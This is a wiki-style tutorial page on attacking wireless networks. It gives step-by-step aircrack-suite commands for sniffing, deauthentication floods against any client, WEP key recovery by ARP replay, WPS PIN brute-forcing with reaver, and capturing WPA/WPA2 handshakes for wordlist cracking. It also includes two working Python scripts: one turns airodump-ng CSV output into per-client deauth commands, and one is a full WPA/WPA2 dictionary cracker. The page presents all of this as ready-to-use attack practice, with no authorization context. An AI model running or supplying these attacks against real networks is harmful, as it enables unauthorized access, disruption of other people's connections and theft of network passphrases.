====== Wireless: Hack ======

===== Packet Sniffing (airodump) =====

**man page:** airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with aircrack-ng.

NOTE: Ctrl-c to exit.

  * General wireless packet sniffing is done with ''airodump-ng'', part of the [[https://www.aircrack-ng.org/documentation.html|aircrack-ng]] suite.
  * This gives you general information about the wireless **//__networks__//** around you (BSSID, channel, encryption, ESSID) and, in a lower block, the clients talking to them.

Syntax:

<code bash>
airodump-ng [options] <interface>
</code>

Must first enable monitor mode ([[hack_wireless_setup#change_adapter_mode|see here]]). Then run (assuming the monitor-mode interface is named wlan0):

<code bash>
airodump-ng wlan0               # 2.4 GHz only, quicker
airodump-ng --band a wlan0      # 5 GHz only, quicker
airodump-ng --band abg wlan0    # 5 GHz + 2.4 GHz, slower (hops over both bands)
</code>

Once you find a target network in the information provided by ''airodump-ng'', move on...

----

===== Targeted Sniffing =====

Here you specify the target network (BSSID + channel) you want to work with...

**Target One Specific Network:** From the general sniff of all traffic you just did, copy the target BSSID and channel number:
  * Run it without ''--write filename'' if you just want to see the network and the clients on that network.
  * You will see two sections: the top is the network, the bottom shows the clients ("stations") on the network.

<code bash>
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0
</code>

This creates files in your current working directory (''filename-01.*''; the number increments on each run).
  * .cap file: data captured (everything sent to and from the target network).
  * If the network uses encryption, the data payloads in the capture are encrypted; management frames (beacons, probes, deauths) are still readable.
  * .csv file: the same AP and station tables ''airodump-ng'' shows on screen, in text form you can grep or parse.

**Wireshark:** use it to analyze the data you captured... open the .cap file.

----

===== DeAuth Attack =====

**Deauthentication Attack:** Disconnect any client from any network...
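The deauth command below needs two MACs: the access point (''-a'') and the client (''-c''). Instead of copying them off the ''airodump-ng'' screen, you can read them from the ''filename-01.csv'' that ''airodump-ng --write'' produces. The following is an added example, not code from this page or from the aircrack-ng project: a small Python parser for that CSV layout (an AP table, a blank line, then a "Station MAC" table), run over a constructed sample rather than a real capture. The BSSIDs, station MACs, ESSIDs and counts in ''SAMPLE_CSV'' are made up; the column order is the one airodump-ng writes.

```python
"""Parse airodump-ng's filename-01.csv and pick the BSSID/channel/clients for a target ESSID."""
import csv

# Constructed sample in airodump-ng's CSV layout (not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2023-01-01 10:00:00, 2023-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,  10, ExampleNet,
66:77:88:99:AA:BB, 2023-01-01 10:00:01, 2023-01-01 10:05:00, 11,  54, WEP , WEP, , -70,   90, 3412,   0.  0.  0.  0,   7, OldRouter,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2023-01-01 10:00:05, 2023-01-01 10:05:00, -50,  300, 00:11:22:33:44:55, ExampleNet
AA:BB:CC:DD:EE:02, 2023-01-01 10:01:00, 2023-01-01 10:04:00, -60,   12, 00:11:22:33:44:55,
AA:BB:CC:DD:EE:03, 2023-01-01 10:02:00, 2023-01-01 10:05:00, -80,    4, (not associated) , FreeWifi,CoffeeShop
"""


def parse_airodump_csv(text):
    """Return (aps, stations): aps maps BSSID -> dict, stations is a list of dicts."""
    lines = text.splitlines()
    # The station table starts at the "Station MAC" header; everything above it is the AP table.
    split = next((i for i, line in enumerate(lines) if line.startswith("Station MAC")), len(lines))

    aps = {}
    for row in csv.reader(lines[:split]):
        if len(row) < 15 or row[0].startswith("BSSID"):
            continue  # blank line or header
        aps[row[0].strip()] = {
            "channel": int(row[3]),
            "privacy": row[5].strip(),          # WEP / WPA / WPA2 / OPN
            "cipher": row[6].strip(),
            "power": int(row[8]),
            "ivs": int(row[10]),                # "# IV": WEP packets with unique IVs (#Data on screen)
            # ESSID may itself contain commas; Key is always the last field, so join what is in between.
            "essid": ",".join(row[13:-1]).strip(),
        }

    stations = []
    for row in csv.reader(lines[split:]):
        if len(row) < 6 or row[0].startswith("Station MAC"):
            continue
        stations.append({
            "mac": row[0].strip(),
            "power": int(row[3]),
            "packets": int(row[4]),
            "bssid": row[5].strip(),            # "(not associated)" for clients only probing
            "probed": ",".join(row[6:]).strip(),
        })
    return aps, stations


def clients_of(aps, stations, essid):
    """BSSID, channel and client MACs for the strongest AP advertising `essid`."""
    candidates = [b for b, ap in aps.items() if ap["essid"] == essid]
    if not candidates:
        raise KeyError(f"no AP with ESSID {essid!r}")
    bssid = max(candidates, key=lambda b: aps[b]["power"])
    macs = [s["mac"] for s in stations if s["bssid"] == bssid]
    return bssid, aps[bssid]["channel"], macs


def deauth_commands(bssid, channel, macs, iface="wlan0"):
    """The airodump-ng (channel lock) and aireplay-ng (deauth) lines for each client."""
    cmds = [f"airodump-ng --bssid {bssid} --channel {channel} {iface}"]
    cmds += [f"aireplay-ng --deauth 4 -a {bssid} -c {mac} {iface}" for mac in macs]
    return cmds


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    bssid, channel, macs = clients_of(aps, stations, "ExampleNet")
    print("\n".join(deauth_commands(bssid, channel, macs)))
```

Point it at a real file with ''parse_airodump_csv(open("filename-01.csv").read())''. The ''ivs'' field is the same count the WEP section below relies on, so the parser doubles as a quick way to rank WEP targets by how many IVs you have already collected.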
**Tool:** ''aireplay-ng''

<code bash>
aireplay-ng --deauth 10000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# --deauth N : number of deauth bursts to send (a huge N keeps the client off; 0 = until stopped)
# -a         : MAC of the access point
# -c         : MAC of the client to kick off; omit it to broadcast the deauth to every client
</code>

Option ''-a'' is the MAC address of the access point and ''-c'' the client machine on the network you are deauthenticating.
  * Remember: to get a client MAC address, run ''airodump-ng'' against the specific network in order to see all the clients. The clients show up in the second (lower) block of information, under STATION:

<code bash>
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0
</code>

This may still fail unless you are also running ''airodump-ng'' against the target network (the command just above) in another terminal: with ''--channel'' set it keeps the card parked on the target's channel instead of hopping, so the injected frames actually reach the client.

----

===== Encryption =====

  * If your target is wired, you simply connect to it and you're in.
  * If your target is wireless w/o encryption, you connect and you're in.
  * If your target is wireless + encryption... you need to break in.

----

==== WEP ====

WEP: Wired Equivalent Privacy (Old & Easy)

**Tool:** ''aircrack-ng'' (recovers the WEP key statistically from a large number of captured Initialization Vectors)
  * The IV is a 24-bit value sent in plain text with every encrypted frame.
  * The IV is prepended (as a prefix) to the WEP key; together they seed RC4, and the resulting keystream is XORed with the packet.
  * Because the IV is short and visible, IVs repeat on a busy network and each captured IV leaks a little information about the key.

All you need to do is capture a bunch of packets (''airodump-ng''), analyze the captured IVs (''aircrack-ng'') and discover the WEP key.
  - Capture the specific BSSID + channel as above. Store the capture in a file.
    * The ''#Data'' column shows the number of useful packets with unique WEP IVs.
    * The higher the number the more likely you'll be able to crack the key (on the order of tens of thousands of IVs with the default PTW attack).
  - Run ''aircrack-ng'' against your ''airodump-ng'' capture (.cap) file.

<code bash>
aircrack-ng filename-01.cap
</code>

Take the key from ''aircrack-ng'' (XX:XX:XX:XX:XX), remove the colons, and use that hex string to log into the network.

**PROBLEM:** If the network isn't busy enough, the ''#Data'' count will not increase enough.

**SOLUTION:** Generate your own traffic... force the access point to generate new IVs.
  * Run an "arpreplay" attack.
  * We cannot //connect// to the AP (we don't have the key) but we can //associate// with it using fake authentication.

**TOOL:** ''aireplay-ng''

1. Run ''airodump-ng'' against your target network (as above) in one terminal window:

<code bash>
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0
</code>

2. Associate with this network with ''aireplay-ng'' in another terminal window:

<code bash>
aireplay-ng --fakeauth 0 -a [MAC of target router] -h [MAC of wireless adapter] wlan0   # "0": run the fake authentication once, no re-association timer
</code>

3. Now communicate with the network you are associated with via ''aireplay-ng'':
  * Inject packets into the router to force it to generate new IVs.
  * Use an ARP request replay attack...
  * THEORY: capture an ARP request, re-transmit it, thus forcing the router to produce another encrypted packet with a new IV. Lather, rinse, repeat.

<code bash>
aireplay-ng --arpreplay -b [MAC of target router] -h [MAC of wireless adapter] wlan0
</code>

4. Then run ''aircrack-ng'' on the ''airodump-ng'' capture (''filename-01.cap''). The ''replay_arp-*.cap'' file that ''aireplay-ng'' writes only holds the ARP packets it replays; the IVs you need are in the ''airodump-ng'' capture.

<code bash>
aircrack-ng filename-01.cap
</code>

----

==== WPA & WPA2 ====

For our purposes the main difference is the encryption method: WPA uses TKIP (RC4-based) and WPA2 uses CCMP (AES-based). Both derive their keys from the pre-shared key through the same 4-way handshake, so the same methods will work with both WPA and WPA2.

----

=== WPS Misconfiguration Exploit ===

WPS (Wi-Fi Protected Setup) lets clients obtain the network key without typing the passphrase.
  * Originally provided to simplify connecting printers and other peripherals.
  * "PBC": Push Button Configuration (peripheral and router each have a WPS button).
  * "PIN": authenticates against an 8-digit PIN. The PIN is verified in two halves and its last digit is a checksum, so at most about 11,000 guesses cover the whole space. Easy hack.
  * The router, however, must be (mis)configured to accept PIN authentication from an external registrar, NOT PBC only, and must not lock WPS after failed attempts.
  * Check this first (since WPA/WPA2 passphrases are so hard to crack).

1. TOOL: ''wash'' (displays all networks with WPS enabled). If it errors out in monitor mode, the author's workaround is to switch the interface to auto mode for the scan:

<code bash>
wash --interface wlan0          # if this errors out, do the following...
ifconfig wlan0 down             # or: ifdown wlan0
iwconfig wlan0 mode auto
ifconfig wlan0 up               # or: ifup wlan0
wash --interface wlan0          # remember to change the mode back to monitor for the attacks
</code>

2.
Associate with the network (as above)... set this up but **//DO NOT RUN IT YET//**:

<code bash>
aireplay-ng --fakeauth 30 -a [MAC of target router] -h [MAC of wireless adapter] wlan0   # re-associate with the target network every 30 seconds
</code>

3. In another terminal window run ''reaver'' to brute force the PIN:

<code bash>
reaver --bssid [MAC of target router] --channel [#] --interface wlan0 -vvv --no-associate
</code>

4. Launch ''reaver'' and then the ''aireplay-ng'' command you set up but did not run.
  * If WPS is not misconfigured, the AP is PBC-only, or it locks WPS after a few bad PINs... then this won't work. Move on...

----

=== WPA/WPA2 CRACKING ===

The only packets that can aid cracking WPA and WPA2 are the handshake packets.
  * These are the four EAPOL-Key frames of the 4-way handshake, exchanged when a client connects to the network. They never carry the passphrase itself, only nonces and a MIC computed with keys derived from it.
  * Here's the process...

1. Run ''airodump-ng'' against all reachable networks...

<code bash>
airodump-ng wlan0               # 2.4 GHz only, quicker
airodump-ng --band a wlan0      # 5 GHz only, quicker
airodump-ng --band abg wlan0    # 5 GHz + 2.4 GHz, slower
</code>

2. Find your target router and run ''airodump-ng'' to dump data to a file...

<code bash>
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0
</code>

3. Let it run and wait for the handshake to occur (someone connecting to the router). ''airodump-ng'' shows ''WPA handshake: <BSSID>'' in its top line once it has captured one.

4. If you're impatient, deauthenticate a currently connected client; it will reconnect, giving you the handshake you want.

<code bash>
aireplay-ng --deauth 4 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# --deauth 4 : send 4 bursts
# -a         : MAC of the router
# -c         : MAC of the client to disconnect
</code>

5. Use that captured handshake to get the key for the wireless network (see next).

6. Wordlist: a very large text file of candidate passphrases to try against the handshake.
  * You can either create one of your own or download one (or combine the two).
**Create your own word list with ''crunch''**

<code bash>
crunch [min] [max] [characters] -t [pattern] -o [filename]   # syntax
crunch 6 6 123abc$ -t a@@@@b -o wordlist                      # example: 6-char words starting with "a" and ending with "b"
</code>

With ''-t'', min and max must both equal the pattern length; each ''@'' is replaced by one character from the character set.

^ option ^ description ^
| min | minimum number of characters for the password to be generated |
| max | maximum number of characters for the password to be generated |
| characters | specify the characters you want to generate passwords from |
| pattern | if you know something about the password (e.g., starts with "a") |

**Links to wordlists:**
  * ftp://ftp.openwall.com/pub/wordlists/
  * http://www.openwall.com/mirrors/
  * https://github.com/danielmiessler/SecLists
  * http://www.outpost9.com/files/WordLists.html
  * http://www.vulnerabilityassessment.co.uk/passwords.htm
  * http://packetstormsecurity.org/Crackers/wordlists/
  * http://www.ai.uga.edu/ftplib/natural-language/moby/
  * http://www.cotse.com/tools/wordlists1.htm
  * http://www.cotse.com/tools/wordlists2.htm
  * http://wordlist.sourceforge.net/

7. Use ''aircrack-ng'': wordlist + handshake to crack the password.
  * ''aircrack-ng'' will unpack the handshake and extract the useful information: SSID, AP and client MACs, the two nonces, the EAPOL frame and its MIC.
  * The MIC (Message Integrity Code) in the handshake is what the access point and client use to prove to each other that they hold the same key.
  * For each word in the wordlist, it derives the PMK from the word and the SSID (PBKDF2, 4096 iterations), derives the PTK from the PMK, MACs and nonces, and generates a MIC over the captured EAPOL frame.
  * It compares that MIC with the MIC in the handshake. If they match, your word is the passphrase.
  * TAKE-AWAY: Success depends on your wordlist. If the passphrase isn't in it, no amount of time helps.
  * This will take a lot of time (the PBKDF2 step is deliberately slow). ''aircrack-ng'' itself is CPU-only; GPU-based crackers can take the same handshake and speed up the comparison process considerably.
  * Make sure you are in the directory with your ''airodump-ng'' .cap file (that captured the handshake) and the .txt wordlist...

<code bash>
aircrack-ng filename-01.cap -w wordlist.txt
#           ^ name of the capture file from airodump-ng
</code>

----

We'll have some more goodies later... :-)
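The MIC check that step 7 above describes, written out in Python as an added example (this is not code from the page or from aircrack-ng, which does the same work in C): PBKDF2 turns the candidate passphrase and SSID into the PMK, the 802.11i PRF expands PMK + MACs + nonces into the PTK, the first 16 bytes of the PTK (the KCK) key an HMAC over the EAPOL frame with its MIC field zeroed, and the result is compared with the captured MIC. Key descriptor version 1 (WPA/TKIP, HMAC-MD5) and version 2 (WPA2/CCMP, HMAC-SHA1) are both handled, which is why the same attack works on both. The handshake it runs against is constructed, not captured: the MACs, nonces, EAPOL frame, SSID ''ExampleNet'' and passphrase ''ilovewifi2014'' are made-up values; the only external reference used is the passphrase-to-PMK test vector ("password" / "IEEE") from IEEE 802.11i Annex H.

```python
"""WPA/WPA2-PSK dictionary attack on a captured 4-way handshake (what aircrack-ng -w does)."""
import hashlib
import hmac

# Byte offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# EAPOL header(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
# + key nonce(32) + key IV(16) + key RSC(8) + key ID(8) = 81
MIC_OFFSET = 81


def passphrase_to_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). The slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter) concatenated and truncated."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK plus the two MACs and two nonces, all visible in the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck, eapol_frame, key_version):
    """Key MIC over the EAPOL frame with its MIC field zeroed.
    key_version 1 (WPA/TKIP): HMAC-MD5. key_version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes.
    Version 3 (AES-128-CMAC) is not handled here."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(hs, wordlist):
    """Return the passphrase whose derived MIC matches the captured one, or None if not in the list."""
    for word in wordlist:
        pmk = passphrase_to_pmk(word, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["key_version"]), hs["mic"]):
            return word
    return None


def build_sample_handshake(passphrase="ilovewifi2014", ssid="ExampleNet"):
    """Constructed message-2 handshake (made-up values, not a real capture) so the attack runs offline."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("aabbccddee01")
    anonce = bytes(range(32))          # random in reality, taken from message 1
    snonce = bytes(range(32, 64))      # random in reality, taken from message 2
    key_info = 0x010A                  # MIC bit | Pairwise | key descriptor version 2 (HMAC-SHA1)
    body = (bytes([2]) + key_info.to_bytes(2, "big") + bytes(2) + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
    eapol = bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key
    kck = derive_ptk(passphrase_to_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, 2)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "key_version": 2,
            "eapol": eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:], "mic": mic}


if __name__ == "__main__":
    hs = build_sample_handshake()
    print(crack(hs, ["password", "letmein", "ilovewifi2014", "qwerty123"]))
```

Every guess costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is where the time goes and why a GPU helps; the PTK derivation and MIC are cheap by comparison. Note that nothing in the handshake lets you check a guess faster than this, so the wordlist really is everything.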